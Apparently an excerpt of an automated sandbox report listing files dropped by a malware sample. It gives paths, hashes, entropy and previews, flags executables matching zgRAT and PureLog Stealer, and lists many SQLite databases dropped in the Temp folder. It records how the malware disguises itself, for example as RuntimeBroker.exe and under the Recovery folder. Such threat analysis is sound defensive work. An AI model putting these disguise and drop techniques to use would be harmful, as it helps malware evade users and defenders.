Preview:	2ML9iZiYurrnL5eTzUCWJu2tCkEnlsPfQqb7xQzmN79D1VXMGAaQQkSITc77V4wCbLWedgfieaILuz1rN1hlR8OqXTnVT2QSL7lp82sje1w0bHXelQudXLud6qHJ3KPlJ0AxNLsUJ7HaMYOQ5IuDIx49MItRviqTlKqlGjRZhZUZETQic0NuaMdW5AlFcbikRxzCsnJW1Ufsdf521Lz4U53YqUpG8L7F0tHQeOzyr12Fqu2aEsNRlnPW3aVX8CXqXa2tXpYnVBNdCyr5bPCQ7pdMdvWD2c0oeMrQ2ICZTk6kawTFsZ5sAHsr6pQmSVv2Ki80GbDTNm6Xt3wrbQUcgHoWe9UN2ZG8zDa1xd9RWmfXKU8D3iLBBSWD4lWGGzayg8iqc438RCF4mQMJBRUTOF6grX7LH3LgLr1LwRk8pNu8McanZMEyfHjaBB9F6r0Y1js5ZAWtrVo

C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1920000
Entropy (8bit):	7.535182328864218
Encrypted:	false
SSDEEP:	24576:4hNXfa1eVzqP3FsO+F8obr53uRdZvAADFrO0mtbnD6d5xknbg5bUEKUXOEbDzkaS:4+U5kzXDFrO0iTb0bzveEX99
MD5:	3C3B7D5864E9F151A77B33D4B9D15E3C
SHA1:	D8A0C81C551DA2C1E500EB2B56562A2AC0BE2C81
SHA-256:	DE07619885CBD439FA402A13CEDF8EDF1D67B2AE4FB078F8DC18AE7A662A7D23
SHA-512:	5204B39F1008093E95221B9A7EA14BE6BBA59A5A47D0447CFDC503C524FEF9AA4001785AC0CD333F19817B6D428E2034772F6134BC84493A74F47CCA2672D642
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#.f.................D...........b... ........@.. ....................................@..................................a..K....... ............................................................................ ............... ..H............text...$B... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................b......H............................x..Ea.......................................0..........(.... ........8........E....)...9...8.......8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0..)....... ........8........E............F...........o...8........~....(s...~....(w... ....<.... ....~....{....9....& ....8....~....:.... ....~....{....9....& ....8t...~....(k... .... .... ....s....~....(o....... ....~....{....:4...& ....8)...8:... ....8

C:\Users\Default\AppData\9e8d7a4ca61bd9

Download File

Process:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
File Type:	ASCII text, with very long lines (979), with no line terminators
Category:	dropped
Size (bytes):	979
Entropy (8bit):	5.913555171005253
Encrypted:	false
SSDEEP:	24:mXDwk8sBCNSAmVP7ZDw3b4+xaaTEtP80M3wwcnb:mMk87SPR+0+xP+U0KwVb
MD5:	4345AE6E0AE982FACD94D118A6CFC5BE
SHA1:	711017F2A32123D7B95588FD87924CEFA808FD7D
SHA-256:	985E694C6D8490A37FA1B75282BCC12767CAB450D79218C9ABE3CDB50CC26C2B
SHA-512:	8D746214818C45D73EC2A5865C69D545615341800B84367B1850DF5C290DFB087AA7861F1B759181A0118BE2FC896420AB3015F1597315A7EF39BA0C8284318E
Malicious:	false
Preview:	tl4kgscL1MEnFLztPwmvcJdsd9lz3tcgfNGFhSKJQBQno31hctgeoQgkHMGgHmSIthI1EuL6mcfa20EkIDXJM82Prg7VMoCnsI3GuAdshj2LuGrRIfYDPI5up2Jiwzu8a1ru670HkomnGqelypNrP8YkMIb1045rz4v2Y6UKpRdkgSo8YitGmCscdHhyf8Qqt4xM5lM2VCC8fxE4ecdSKyFxLSZRYgpqAx0mecDwW1vjAu7qDmTCe8f5yAAmM5dyXV7r6bZBYq6SCgwbVsNvMmLCR5xebbkaX6LpwPtlMRoyBM2RNjQdrrmvJ5aAo5k6Ff4GUHoF8mi47XAFDfR2LGtqUaf1zs6RrrsgRv7F4KeEIrxv4U7Inrv9wOw4lxQQpRNQoexRiL7Alohmmt7evyn95ttD9CeH4OZ1egHahpkctvXIrJS10vf1nNV5uuRgr0GXOpIFmh6FNLPKVlV0umRIthOQLLpxYEv3oA3BAMPSyZnc7KjIYavEj8nrb14a1JrJZWfVsU0hX8TT4wTAmhY7SqTqWMkISybpsdCkpOaEkNrloTwpi3yUut1tDy8gtrPigolatsVYGUWE8rCCZ5jY9H48mSh0P4U28IFAsW50haNaXwuVw6GyI0jYtmyaKeJM9dGzmBUD9s1j3dlziMDTxguHjqQGhfqDRBb3q5svlDzZ99ePA927bzYds9Q6uNfeCyS2CrJmdSruqVHjLAFimslbm7KqpwAYhVWLrmNSzPeIIowX1qvuI71UM1QEhc7rSTMV861jxwsWOcS8Lxz8BQPkdC90WIvWRw0zbaY5yL6VOeGtiS3tn9qCDm166BNoAWEbmdguZ3JzT3V86QSDPCtSGywzjc8x8RV2ZoGFvIUuz0sJQ39qsJZ8nwUxrqL64W0BidjRJNSGs8cPFmipcSEz2XPnUTYE7XzdArkwTshf0TPoTEsEIfemRAJLO570yNIUJ9PYBvWuui8

C:\Users\Default\AppData\RuntimeBroker.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1920000
Entropy (8bit):	7.535182328864218
Encrypted:	false
SSDEEP:	24576:4hNXfa1eVzqP3FsO+F8obr53uRdZvAADFrO0mtbnD6d5xknbg5bUEKUXOEbDzkaS:4+U5kzXDFrO0iTb0bzveEX99
MD5:	3C3B7D5864E9F151A77B33D4B9D15E3C
SHA1:	D8A0C81C551DA2C1E500EB2B56562A2AC0BE2C81
SHA-256:	DE07619885CBD439FA402A13CEDF8EDF1D67B2AE4FB078F8DC18AE7A662A7D23
SHA-512:	5204B39F1008093E95221B9A7EA14BE6BBA59A5A47D0447CFDC503C524FEF9AA4001785AC0CD333F19817B6D428E2034772F6134BC84493A74F47CCA2672D642
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\AppData\RuntimeBroker.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\RuntimeBroker.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\RuntimeBroker.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\RuntimeBroker.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#.f.................D...........b... ........@.. ....................................@..................................a..K....... ............................................................................ ............... ..H............text...$B... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................b......H............................x..Ea.......................................0..........(.... ........8........E....)...9...8.......8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0..)....... ........8........E............F...........o...8........~....(s...~....(w... ....<.... ....~....{....9....& ....8....~....:.... ....~....{....9....& ....8t...~....(k... .... .... ....s....~....(o....... ....~....{....:4...& ....8)...8:... ....8

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PerfNET.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.350961817021757
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5:	EBB3E33FCCEC5303477CB59FA0916A28
SHA1:	BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256:	DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512:	663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xMWILCHEwdBVCAxxjofRRL.exe.log

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	19253
Entropy (8bit):	5.005753878328145
Encrypted:	false
SSDEEP:	384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
MD5:	81D32E8AE893770C4DEA5135D1D8E78D
SHA1:	CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
SHA-256:	6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
SHA-512:	FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul/nq/llh:NllUyt
MD5:	AB80AD9A08E5B16132325DF5584B2CBE
SHA1:	F7411B7A5826EE6B139EBF40A7BEE999320EF923
SHA-256:	5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
SHA-512:	9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\0G4FAwZdJa

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0KcprG7cSu

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0UZZQBwp34

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0Wow64VOiS

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0k90vbiliD

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1IvViTUHcK

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1LkFz6zABB

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1hrO6Rgjcf

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2Hgi4BSFv5

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2SF9O0qESe

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\31WQwtFHpd

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3TQgeIF3C9

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:WX9XEhK:QB
MD5:	6163B102B0FBA4D85CC0B56939C5FBD5
SHA1:	333EB0E96B59EC850292B6B8B8F32B23927BD6FC
SHA-256:	AB8F156C99EB4329F4292046D589CE6E2E4F98493A62763A3AE933A99E473059
SHA-512:	F0C7052F78C75396078F23DB58A7D26122DE7AC043F8CE0B17DF9B6C1368CF3599CB5D53B84D855E91FDDD1AF89006D98DEE930A2262C07EB9D19AC993D098CC
Malicious:	false
Preview:	WkMRf02zRprK4MoIA7wVHamWh

C:\Users\user\AppData\Local\Temp\3dCkfySUXt

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3ucfGeu1as

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3v5btpnvgg

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
